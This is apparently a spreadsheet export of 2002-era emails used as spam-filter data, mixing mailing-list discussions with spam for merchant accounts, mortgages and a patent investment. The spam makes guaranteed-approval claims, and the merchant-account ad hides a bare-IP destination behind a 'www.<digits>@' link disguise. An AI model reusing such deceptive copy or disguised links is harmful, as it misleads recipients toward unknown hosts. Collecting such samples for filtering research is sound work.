 &lt;br&gt;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e=3D"-1"&gt;&lt;b&gt;&amp;nbsp;JOHN MORRIS AND JOSH TAYLOR&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;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ontpage/authors/143.gif" alt=3D"JOHN MORRIS AND JOSH TAYLOR" border=3D"0"&gt;&lt;=
 br&gt;&lt;/td&gt;
                 &lt;td width=3D8&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/fr=
 ontpage/b.gif" width=3D"1" height=3D"8"&gt;&lt;br&gt;
                 &lt;font face=3D"Arial, Helvetica" size=3D"-1"&gt;
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D9a-b6_GQTM=
 BGSMss07Figi7yr9FKgnR" &gt;&lt;b&gt;Toshiba's new Pocket PC: Beautiful inside and ou=
 t&lt;/b&gt;&lt;/a&gt;&lt;br clear=3D"all"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/clear.=
 gif" width=3D"1" height=3D"4"&gt;&lt;br clear=3D"all"&gt;
                 Beauty is only skin deep, which is why it's so important th=
 at Toshiba revamped both  body and soul in its Pocket PC e740. Josh and Joh=
 n tell you how the PDA's improved. Plus: The latest reviews on ZDNet.&lt;/font=
 &gt;&lt;/td&gt;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href=3D"http://clickthru.online.com/Click?q=3Daf--dB8QLp=
 qkpZHh87ydDX7NdmUVSeR" &gt;&lt;b&gt;3 tools for viewing any file format under the su=
 n&lt;/b&gt;&lt;/a&gt;&lt;br clear=3D"all"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/clear.=
 gif" width=3D"1" height=3D"4"&gt;&lt;br clear=3D"all"&gt;
                 Got a lot of obscure file formats on your PC? Unimpressed w=
 ith Windows Explorer's ability to view them all? Preston's got three downlo=
 ads that let you see the contents of just about any file--even the ones you=
 've never heard of.&lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;/table&gt;&lt;p&gt;
         &lt;P&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;  =20
 &lt;p&gt;
 &lt;hr size=3D1 width=3D"80% noshade align=3D"left"&gt;
 &lt;font face=3D"Arial, Helvetica" size=3D"-1"&gt;
 &lt;div align=3Dcenter&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3Dc4-Iy9lQ0Ww9YsZNo4kHF6q-jP=
 exAyR" &gt;&lt;b&gt;AnchorDesk Home&lt;/b&gt;&lt;/a&gt; | &lt;a href=3D"http://clickthru.online.com=
 /Click?q=3D96-pjdWQtduMsOJkLRjZWSoS2P4Jm4R"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rl_login?email=3Dqqqqqqqqqq-zdnet@example.com&amp;brand=3Dzdnet'&gt;free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href=3D'http://clickthru.online.com/Click?q=3Dab-Zc0KrJp=
 xbywKmMrqydP5ntSIwzaBMRRR'&gt;Unsubscribe&lt;/a&gt;&amp;nbsp;|=20
         &amp;nbsp;&lt;a href=3D'http://nl.com.com/servlet/url_login?email=3Dlegit-=
 list-zdnet@example.com&amp;brand=3Dzdnet'&gt;Manage=20
         My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href=3D"http://clickthru.online=
 .com/Click?q=3Dc0-kfs-QWP2zt98XJC41H99K8FZuSiR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|=20
         &amp;nbsp;&lt;a href=3D"http://clickthru.online.com/Click?q=3Dd5-p-viQzL1a=
 sEbbjbHCu4jNix1DPPR"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href=3D"http://clickthru.online.com/Click?q=3Dea-fjLyQhV4=
 N6BGQBAAwQ4lAUw-5WnR" &gt;&lt;img src=3D"http://www.zdnet.com/graphics/newsletter=
 s/gl_ft.gif" width=3D75 height=3D43 border=3D0 alt=3D"ZDNet"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=3D525&gt;&lt;font face=3D"arial, helvetica" size=3D"-2" color=3D"#fffff=
 f"&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D00-4FQlI9QkpoMrLNRbgi4c=
 Hr7W6TiR" style=3D"color: #fff"&gt;Home&lt;/a&gt; |&lt;a href=3D"http://clickthru.onlin=
 e.com/Click?q=3D15-mYP_IGck_o1YJt_AV-hDEc2lRbPR" style=3D"color: #fff"&gt;eBus=
 iness&lt;/a&gt; | &lt;a href=3D"http://clickthru.online.com/Click?q=3D2a-CNuWIrIPIvS=
 SgQNabman8WccrYnR" style=3D"color: #fff"&gt;Security&lt;/a&gt; | &lt;a href=3D"http://c=
 lickthru.online.com/Click?q=3D3f-4sAEIqMW45CwpiYHcoh57BymNzeR" style=3D"col=
 or: #fff"&gt;Networking&lt;/a&gt; | &lt;a href=3D"http://clickthru.online.com/Click?q=
 =3D54-l6ovIZKAREhP4xu0O9U4lR0vdksR" style=3D"color: #fff"&gt;Applications&lt;/a&gt; =
 | &lt;a href=3D"http://clickthru.online.com/Click?q=3D69-CY-iIoWgGqdD__FMoAH4O=
 pRzLxFR" style=3D"color: #fff"&gt;Platforms&lt;/a&gt; | &lt;a href=3D"http://clickthru.=
 online.com/Click?q=3D7e-XDXeInptAgjYFfwi6pURwMpopr9R" style=3D"color: #fff"=
 &gt;Hardware&lt;/a&gt; | &lt;a href=3D"http://clickthru.online.com/Click?q=3D93-V4PmQSd=
 QT6H4KNjcTYjvQ8Rgn5rR"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NL=3De501-01&amp;ISSUE=3D2002-07-12" height=3D1 width=3D1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;=
 tr&gt;  &lt;td colspan=3D2&gt;&lt;font face=3DArial, Helvetica, sans-serif size=3D2&gt;   =
  &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;=20
 &lt;IMG HEIGHT=3D1 WIDTH=3D1 SRC=3D"http://clickthru.online.com/Click?q=3Da9-I=
 lqq-AUenP4C8eNB1Y_B5RSLk9RR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: dubyadubyadubya.dubyaspeak.com
</t>
  </si>
  <si>
    <t xml:space="preserve">
 A worthy study procrastination tool: )
 A few choice phrases from ol dubya himself:
 "And all our history says we believe in liberty and justice for all,
 that when we see oppression, we cry."
 "If you want to keep the peace, you've got to have the authorization to use force.
 -- White House, Sep. 19, 2002"
 "The United States will remain strong in our conviction that we must not, and will not,
  allow the world's worst leaders to hold the United States and our friends and allies blackmail,
  or threaten us with the world's worst weapons."  -- Whats truly sad
  about the "United States and our friends and allies /blackmail/, is
  that he said the same thing in the SAME speech in a paragraph or two
  before.
  "If you find a neighbor in need, you're responsible for serving that neighbor in need,
   you're responsible for loving a neighbor just like you'd like to
   love yourself."
   -- Snerk.   This just begs for potty-mouth comedy.  Too bad the kids
   on southpark just aren't that political.
   "I want to send the signal to our enemy that you have aroused a compassionate and decent and mighty nation, and we're going to hunt you down.
 -- No, I didn't make this one up. Louisville, Kentucky, Sep. 5, 2002
 Hee.. Mkay.
 http://www.dubyaspeak.com
 -- 
 Best regards,
  bitbitch                          mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ACCEPT CREDIT CARDS &amp; TRIPLE YOUR SALES!!               7968
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- saved from url=3D(0022)http://internet.e-mail --&gt;
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"&gt;
 &lt;html&gt;
 &lt;head&gt;
 	&lt;title&gt;NO MONEY Down Merchant Accounts!&lt;/title&gt;
 &lt;/head&gt;
 &lt;style type=3D"text/css"&gt;.main {  font-family: Verdana, Arial, Helvetica, =
 sans-serif; font-size: 12px; color: #000080}
 footer {  font-family: Verdana, Arial, Helvetica, sans-serif; font-size: =
 10px; color: #000000}
 A:link {text-decoration: none; color: #0808F1}
 A:visited {text-decoration: none; color: #0808F1}
 A:active {text-decoration: none; color: #FF0000}
 A:hover {text-decoration: none; color: #1B3351}&lt;/style&gt;
 &lt;body topmargin=3D"4" leftmargin=3D"4"&gt;&lt;table width=3D"500" align=3D"cente=
 r" cellspacing=3D"0" cellpadding=3D"2"  border=3D"1" bordercolor=3D"#1A192=
 9"&gt;
 &lt;tr&gt;
 	&lt;td&gt;&lt;table width=3D"496" bgcolor=3D"#E0E9F1" border=3D"0"&gt;
 &lt;tr&gt;
 	&lt;td&gt;&lt;table&gt;
 &lt;tr&gt;
 	&lt;td&gt;&lt;img src=3D"http://61.129.81.74/images/add1.1.gif" alt=3D"" width=3D"=
 101" height=3D"140" border=3D"0"&gt;&lt;/td&gt;
     &lt;td align=3D"justify" valign=3D"top" class=3D"main"&gt;&lt;strong&gt;&lt;font size=
 =3D"4" face=3D"verdana" color=3D"#142A48"&gt;&lt;center&gt;NO MONEY Down Merchant A=
 ccounts!&lt;/center&gt;&lt;/font&gt;&lt;/strong&gt;&lt;p&gt;
 If you own your own business, you're starting a new business or know someo=
 ne who is... Being able to accept Major Credit Cards can make all the diff=
 erence in the world!&lt;P&gt;
 &lt;center&gt;&lt;strong&gt;&lt;font size=3D"3" color=3D"ED1C24"&gt;&lt;a href=3D"http://www.91=
 0736149710429186250134857@61.129.81.74/bp/mer1/index.html"&gt;CLICK HERE&lt;/a&gt;&lt;=
 /font&gt;&lt;/strong&gt;&lt;/center&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;table&gt;
 &lt;tr&gt;
 	&lt;td align=3D"justify" valign=3D"top" class=3D"main" background=3D"http://=
 61.129.81.74/images/add1.2.gif"&gt;Just the fact that you accept credit cards=
  adds credibility to your business. Especially if you are a New, Small or =
 Home Based Business.&lt;p&gt;
 &lt;blockquote&gt;&lt;font color=3D"FC040A"&gt;&lt;li&gt;No Payment For The First Month!&lt;/li=
 &gt;&lt;br&gt;
 &lt;li&gt;Setup within 3-5 Days&lt;/li&gt;&lt;/font&gt;&lt;/blockquote&gt;&lt;p&gt;
 Approval is quick and our set up times range from 3 - 5 days. Guaranteed a=
 pproval on all leases for equipment or software. Bad credit, no credit, no=
  problem!&lt;p&gt;
 &lt;center&gt;&lt;font size=3D"4" color=3D"FC040A"&gt;ACCEPT CREDIT CARDS ONLINE or OF=
 FLINE !!&lt;/font&gt;&lt;p&gt;&lt;br&gt;
 &lt;font size=3D"4" color=3D"FC040A"&gt;&lt;a href=3D"http://www.910736149710429186=
 250134857@61.129.81.74/bp/mer1/index.html"&gt;CLICK HERE&lt;/a&gt;&lt;/center&gt;&lt;/font&gt;&lt;=
 p&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;td&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;table bgcolor=3D"#ffffff"&gt;
 &lt;tr&gt;
 	&lt;td class=3D"footer" align=3D"justify" valign=3D"top"&gt;
 If you'd like to be removed from our mailing list, please click on the lin=
 k below. &lt;p&gt;
 We protect all email addresses from third parties. Thank you. &lt;a href=3D"h=
 ttp://61.129.81.74/remove/remove.htm"&gt;Please remove me.&lt;/a&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, 2002-08-24 at 08:04, Gregory Alan Bolcer wrote:
 &gt; There's been well documented articles, studies of the
 &gt; French tax laws, corporate governance, and financial
 &gt; oversight that 1) dont' easily allow for ISOs, the root
 &gt; of almost all entrepreneurialship, and 2) the easy flow
 &gt; of capital to new ventures.  It was an extremely large
 &gt; issue, even debated widely in France.
 It is actually a lot worse than this.  What it boils down to is that
 only the privileged class is really allowed to start a serious company. 
 What I found fascinating is that the old French aristocracy effectively
 still exists (literally the same families), but they now hold top
 executive and management positions in the major French firms and the
 government, positions which are only passed on to other blue bloods. Not
 officially of course, but as a strict matter of practice.  And the laws
 and legal structures make sure that this system stays firmly in place. 
 Even for a young French blue blood, strict age hierarchies keep them
 from branching out into a new venture in their own country (though many
 can leverage this to start companies in OTHER countries).  I know about
 the French system first-hand and the executives are quite candid about
 it (at least to Yanks like me who are working with them), but I suspect
 this may hold true for other European countries as well.  
 After all those "revolutions", France is still nothing more than a
 thinly veiled old-school aristocracy, with all the trappings.
 -James Rogers
  jamesr@best.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] Looking for a file / directory in zip file
</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----
 Justin MacCarthy wrote:
 | Is there a way to look for a particular file or directory in 100's of zip
 | files??
 | Something like zgrep but for the filename instead of a word
 |
 | Thanks Justin
 |
 |
 probably there are more elegant solutions, but if your zips are in one
 directory you can do something like
 for i in *.zip
 do
 if unzip -v $i | grep -q FILEYOUWANT
 then
 ~  echo $i
 fi
 done
 Cheers,
 Waider.
 - --
 waider@waider.ie / Yes, it /is/ very personal of me
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
 iQEVAwUBPW5AmaHbXyzZsAb3AQH+qQgA1vnUjJUwGDa1yCRQd3vZAnhkCF0KDBBA
 o9MYq4CUg9cEzKALkTyZu4eOprhL50ReaICUGLMMEc5htU9zove4F+CSuvbAKKHL
 nx7xa6kk2V+LFnwS6hWpdQolCaT+4iGZZbdFwmyNAWb/IrEYB0R4gp05sitDOl5U
 RRlzYSM3IUYDrYpDUuX7Ta7bLvSdC1PpWSqy/wXphNIh7Bs2+eB9ERAujuqi6vJo
 MBichYb3f3teVCQUbxTcaMowjpmv/Xm3gdUlGrUFbpc2O7447Xi5uDfRexzzDoJT
 HlFS6OO2ZqzcMrtUYEgsfyqpaF1WuD38JoFpa2TmSyX74bBhxS8ecw==
 =KYCm
 -----END PGP SIGNATURE-----
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Gold Lake Mountain Resort looks pretty gooood. Man there are a
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/23#When:12:00:00AM
 Date: 1/1/1904; 12:00:00 AM
 Gold Lake Mountain Resort[1] looks pretty gooood. Man there are a lot of cool 
 relaxing places to stay in Colorado. Keep the suggestions coming. 
 [1] http://www.goldlake.com/
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Whitelisting (Re: [SAtalk] SA In The News)
</t>
  </si>
  <si>
    <t xml:space="preserve">There is a whitelist RBL now!  Ironport's Bonded Sender is 
 basically a whitelist RBL where you post a bond to get on the 
 list, and then lose the bond if you end up spamming from that IP 
 address (or something like that).  http://www.bondedsender.org/
 C
 On Sunday, August 25, 2002, at 07:58  PM, Bart Schaefer wrote:
 &gt;&gt; 4. DNSBL: Only certifies an ip address, not who is using it. As it is
 &gt;&gt; currently used, DNSBL allows you to look up if some IP address 
 &gt;&gt; has been
 &gt;&gt; blacklisted by someone. What I haven't seen is a service that 
 &gt;&gt; provides a
 &gt;&gt; DNS based whitelist.
 &gt;
 &gt; There's a practical reason for that:  Any DNS list (white or 
 &gt; black) works
 &gt; only for a limited number of IPs; the set of unlisted IPs is 
 &gt; much larger
 &gt; than the set in the DNS list.  If you have to make a binary decision to
 &gt; accept or reject, you'll be wrong less often if you reject the 
 &gt; blacklist
 &gt; and accept everything else, rather than accept the whitelist and reject
 &gt; everything else.
 &gt;
 &gt; A whitelist is only helpful when (a) you only want mail from a limited
 &gt; number of known sources, or (b) you can use a secondary system 
 &gt; like SA to
 &gt; decide what to do with the vast unlisted masses.  Most MTAs still make
 &gt; only the binary decision, because the secondary computation is 
 &gt; expensive.
 &gt;
 &gt; With SA's cooperation, though, it might be worth a try.  Even better if
 &gt; one could get commercial anti-spam outfits to agree to factor it in.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</si>
  <si>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On Wed, 11 Sep 2002, Vince Puzzella wrote:
 &gt; Ever since I set defang_mime 0 all spam that contains HTML has a badly
 &gt; formatted report.  I think/realize it's because the report should be in
 &gt; HTML.  Is there anyway to get Spamassassin to add an HTML report in
 &gt; cases where it is required (defang_mime 0)?
 Funny, I was in the middle of composing the same message when I saw yours.
 It would be nice if it sees a header like:
 Content-type: text/html; charset=iso-8859-1
 and defang_mime is 0, it could wrap the report with &lt;pre&gt;&lt;/pre&gt; for ease
 of reading?
 And the same sort of problem seems to occur with base64 encoded messages.
 The report is placed inside of the mime boundary:
 ------=_NextPart_000_00B7_31E64A2B.B8441E37
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 SPAM: -------------------- Start SpamAssassin results ----------------------
 Should this not go above (probably in it's own mime section,) to make sure
 that the attachments don't get destroyed?
 Ian
 -------------------------------------------
 Ian White
 email: iwhite@victoria.tc.ca
 -------------------------------------------------------
 In remembrance
 www.osdn.com/911/
 _______________________________________________
 Spamassassin-talk mailing list
 Spamassassin-talk@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: NASA mindreading
</t>
  </si>
  <si>
    <t xml:space="preserve">&amp;&gt; Seems also from the news being reported that it's likely they already
 &amp;&gt; have a slice of that pie, which says something about the mindset of
 &amp;&gt; the people handing out the slices.
 When you can hold and sponsor a giant restrictive device (using giant
 restrictorism principles, then,) conference/exhibition and get 30 invited
 exhibitors, with lecturedemos, on elastic polity, concepts of public
 responsibility have gone rather far off theory into quartering.
 The way I reckon it, they plan on fixing the seats/plane and security
 problem by further sectioning airplanes:
 	1- Checked luggage
 	2- Calcium formerly in passengers and crew
 	3- The rest of the passengers
 	4- The cabin and crew, who get a calcium substitute more
 	   readily controlled by a quorum of preservatory agencies.
 	5 (optional:) - Premium services and DRM for checked laptops.
 They reactivate calcium channels and put the calcium back when
 you arrive.  If you don't like it, you have to claim it as they put the
 calcium back, subject to retries, and you have to remember the flight
 number you actually arrived on to do that.
 ...and you suddenly know all about vendors!
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Tired Of Your High Mortgage Rate - REFINANCE TODAY.....
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Homeowner, 
 Interest Rates are at their lowest point in 40 years! We help you find the 
 best rate for your situation by matching your needs with hundreds of 
 lenders!
 Home Improvement, Refinance, Second Mortgage, 
 Home Equity Loans, and much, much more!
 You're eligible even with less than perfect credit!
 This service is 100% FREE to home owners and new home buyers 
 without any obligation. 
 Where others say NO, we say YES!!!
 http://www282.fastwebsnet.com/mtg
 Take just 2 minutes to complete the following form.
 There is no obligation, all information is kept strictly
 confidential, and you must be at least 18 years of age.  
 Service is available within the United States only.
 This service is fast and free. 
 http://www282.fastwebsnet.com/mtg
 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 To opt out:
 http://www282.fastwebsnet.com/optout.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: earthviewer (was Re: whoa}
</t>
  </si>
  <si>
    <t xml:space="preserve">On 9/8/02 7:38 AM, "Gary Lawrence Murphy" &lt;garym@canada.com&gt; wrote:
 &gt;   J&gt; ...  If you want a region of the globe mapped out to a very
 &gt;   J&gt; high resolution (e.g. 1-meter), they can scan the area with
 &gt;   J&gt; aircraft LIDAR and add it to the database, thereby making that
 &gt;   J&gt; region zoomable to the resolution of the database for that
 &gt;   J&gt; area.  
 &gt; 
 &gt; Can you give us an example of an application where 1-m resolution
 &gt; would be worth the considerable expense?
 Planning battle tactics; for this reason, the intelligence press
 reports, spy satellites have had 1-meter resolution for many years.
 Finding an individual vehicle in a city might occasionally be possible
 with 1-m images and might occasionally also be worth the money.
 For small areas you have legitimate access to, it's probably cheaper
 to go there with a digital camera and a GPS and take some snapshots
 from ground level.  Aerial photos might be cheaper for large areas,
 areas where you're not allowed --- or, perhaps, physically able --- to
 go, and cases where you don't have time to send a ground guy around
 the whole area.
 -- 
 &lt;kragen@pobox.com&gt;       Kragen Sitaker     &lt;http://www.pobox.com/~kragen/&gt;
 Edsger Wybe Dijkstra died in August of 2002.  The world has lost a great
 man.  See http://advogato.org/person/raph/diary.html?start=252 and
 http://www.kode-fu.com/geek/2002_08_04_archive.shtml for details.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Earth's magnetic field 'boosts gravity'
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8132228,1440/
 Date: Not supplied
 The controversial claim could be evidence of hidden extra dimensions and help a 
 'theory of everything' fall into place
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 2002-09-17 at 12:50, Justin Mason wrote:
 &gt; What about Tibetan Buddhism BTW?  They seem like an awfully nice bunch
 &gt; of chaps (and chapesses).
 They were the ruling class of a feudal, farming society for quite some
 time; I believe there were more than a few issues there. Certainly, not
 everyone in Tibet is as excited about the Dalai Lama as Hollywood
 appears to be. [Not that the Chinese are much better rights-wise, but
 they've actually built roads and such, which led to the creation of
 merchant classes and the like that never existed under the Tibetans.]
 Luis
</t>
  </si>
  <si>
    <t xml:space="preserve">I went out and drew some chalk circles on my
 sidewalk just so I wouldn't miss out on the experience.
 I've collected half a dozen passwords &amp;
 access to email accounts so far.
 Greg
 bitbitch@magnesium.net wrote:
 &gt; Hello fork,
 &gt; 
 &gt;   So they have Aaron Schwartz on NPR's Weekend Edition talking
 &gt;   about Warchalking.   I'll agree, its funny, his voice is squeaky and
 &gt;   I'm jealous that he got on radio and I didn't...
 &gt; 
 &gt;   But really, WTF is the big deal about warchalking?  I have yet to
 &gt;   see any of it, anywhere.
 &gt; 
 &gt;   LInk will probably pop up on www.npr.org later today.
 &gt; 
 &gt;   
 &gt; 
 -- 
 Gregory Alan Bolcer, CTO  | work: +1.949.833.2800
 gbolcer at endeavors.com  | http://endeavors.com
 Endeavors Technology, Inc.| cell: +1.714.928.5476
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 1 Aug 2002 12:53:00 +0200, Matthias Saou &lt;matthias@egwn.net&gt; wrote:
 &gt; None for that "builds" part : It's just an export of the CVS tree in which
 &gt; I keep my spec files and patches! ;-)
 &gt; I think the filemtime() php function that Ville uses in his sript is what
 &gt; I'm looking for, then I guess I just need to fill an array with the names
 &gt; and mtimes, sort it, then display what I want :-)
     Arg; what a pain.  You can have a cron job to 'digest' this information every so often and populate the database...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</si>
  <si>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Subject: 75% REDUCTION IN ROAD ACCIDENTS
</t>
  </si>
  <si>
    <t xml:space="preserve">This is an HTML email message.  If you see this, your mail client does not support HTML messages.
 ------=_NextPart_AAXPMNBMET
 Content-Type: text/html;charset="iso-8859-1"
 Content-Transfer-Encoding: 7bit
 &lt;html&gt;&lt;head&gt;&lt;title&gt;75% Reduction&lt;/title&gt;&lt;/head&gt;
 &lt;body&gt;
 &lt;body bgcolor="Pink"&gt;
  &lt;p&gt;&lt;div align="Right"&gt;&lt;font color="Blue"&gt;&lt;b&gt;&lt;u&gt;	                                      	                                    August,2002&lt;/b&gt;&lt;/u&gt;&lt;/font&gt;&lt;/div&gt;&lt;/p&gt;&lt;br&gt;
  &lt;br&gt;
 &lt;p&gt;&lt;font face="Times New Roman"&gt;&lt;strong&gt;
 Dear Sir /Madam,&lt;/font&gt;&lt;/strong&gt;&lt;/p&gt;&lt;br&gt;
 &lt;p&gt;&lt;font face="Times New Roman" &lt;b&gt;In case you have received this mail earlier, kindly ignore this  mail. It may have
 been re-sent to you by mistake. Ours is not a mailing list and we have no intention of sending any regular mails to anybody.&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;br&gt;&lt;p&gt;&lt;font face="Times New Roman" &lt;strong&gt;&lt;br&gt;&lt;p&gt;&lt;font face="Arial" &lt;strong&gt;
 &lt;font color="Red"(c) Current yearly automobile sales worldwide - more than 1000 Billion US$. &lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;
 We have devised a set of systems, which can reduce the damage caused to vehicles and deaths and injury caused to Passengers and Pedestrians in vehicular accidents by more than&lt;/strong&gt;&lt;/font&gt; 
 &lt;font color="Red"&gt;&lt;b&gt;&lt;u&gt;SEVENTY-FIVE PERCENT&lt;/B&gt;&lt;/U&gt;&lt;/font&gt;&lt;/P&gt;&lt;BR&gt;
 &lt;P&gt;&lt;FONT FACE="Times New Roman" &lt;strong&gt;
 We have already filed and are in process of filing further, multiple and appropriate &lt;b&gt;D&lt;/b&gt;isclosure &lt;b&gt;D&lt;/b&gt;ocuments, &lt;b&gt;P&lt;/b&gt;rovisional &lt;b&gt;P&lt;/b&gt;atent &lt;b&gt;A&lt;/b&gt;pplications at the &lt;b&gt;U&lt;/b&gt;nited &lt;b&gt;S&lt;/b&gt;tates &lt;b&gt;P&lt;/b&gt;atent &amp; &lt;b&gt;T&lt;/b&gt;rademarks &lt;b&gt;O&lt;/b&gt;ffice&lt;font color="Red"&gt;&lt;b&gt; (USPTO)&lt;/b&gt;&lt;/font&gt;, and also applications under the &lt;b&gt;P&lt;/b&gt;atent &lt;b&gt;C&lt;/b&gt;o-operation &lt;b&gt;T&lt;/b&gt;reaty at &lt;b&gt;W&lt;/b&gt;orld &lt;b&gt;I&lt;/b&gt;ntellectual &lt;b&gt;P&lt;/b&gt;roperty &lt;b&gt;O&lt;/b&gt;rganization&lt;font color="Red"&gt;&lt;b&gt; (WIPO)&lt;/b&gt;&lt;/font&gt; at Geneva. 
 &lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;p&gt;&lt;font face="Times New Roman" &lt;strong&gt;
 There is&lt;font color="Red"&gt;&lt;b&gt;&lt;u&gt; absolutely no doubt&lt;/b&gt;&lt;/u&gt;&lt;/font&gt; that our idea is new and innovative. Moreover, we are very confident and very sure that this will help reducing/minimizing human suffering to a very large extent. There is no doubt that the product devised by us will change the face of the earth forever. &lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;&lt;p&gt;&lt;font face ="Arial" &lt;strong&gt;Brief details relating to our product are  detailed in the  annexures under the following  headings  :&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;
  &lt;OL&gt;&lt;font face="Arial" &lt;em&gt;&lt;font color="Blue"&gt;
  &lt;LI&gt; Statistics                      &lt;LI&gt;Advantages
 &lt;LI&gt;Options
  &lt;LI&gt;Economics                  &lt;/em&gt;&lt;/font&gt;&lt;/OL&gt;&lt;br&gt;
 &lt;font face="Arial"  &lt;strong&gt;We are &lt;font  color ="Red"&gt; &lt;b&gt;&lt;u&gt;looking&lt;/b&gt;&lt;/u&gt;&lt;/font&gt; for the followings:&lt;/strong&gt;&lt;/font&gt;&lt;br&gt;
 &lt;p&gt;&lt;font face="Arial" &lt;strong&gt;01.&lt;font color="red"&gt;&lt;b&gt;Business consultancy and advice&lt;/b&gt;&lt;/font&gt; regarding the most viable, practical and profitable course of action under the circumstances and also consultancy on patents &amp; protection of intellectual property.&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;&lt;p&gt;
 &lt;font face="Arial" &lt;strong&gt;02.&lt;font color="Red"&gt;&lt;b&gt;Financial, Technical and/or Commercial Collaborations&lt;/b&gt;&lt;/font&gt; with any collaborating agency including Angel Investors, Venture Capitalists, Government Agencies, Automobiles and/or automobile accessories manufacturers or in short, any body and every body from anywhere and all over the world.&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;&lt;p&gt;
 &lt;font face="Arial" &lt;strong&gt;We are open to all options including outright sale, licensing and their permutations and combinations. Also, we can  incorporate  a company anywhere a world for implementing this project.&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;p&gt;&lt;font face="Arial" &lt;strong&gt;This project has the potential of considerably reducing human trauma and misery and also saving substantial amounts of money by way of damage to property etc. We are available at the following contact point :&lt;br&gt;
 &lt;br&gt;&lt;br&gt; &lt;a href="mailto:largeinv@indiatimes.com"&gt; largeinv@indiatimes.com&lt;/a href&gt; &lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;p&gt;&lt;font face="Arial" &lt;strong&gt;In case, you feel that some of your friends, acquaintances and associates could be interested and/or helpful in our project aimed at human welfare kindly forward our mail to them. &lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;p&gt;&lt;font face="Arial" &lt;strong&gt;In case you are in a position to provide us with the above named services, or interested in any further dialogue please contact us.&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;p&gt;&lt;font face="Arial" &lt;strong&gt;Hoping to hear from you.&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;&lt;br&gt;
 &lt;p&gt;&lt;font face="Arial" &lt;strong&gt;With Best Wishes and Kind Regards,&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;p&gt;&lt;font face="Arial" &lt;strong&gt;Thanking you,&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;p&gt;&lt;font face="Arial" &lt;strong&gt;Yours sincerely&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;p&gt;&lt;font face="Arial" &lt;strong&gt;JCPPL GROUP&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;&lt;br&gt;
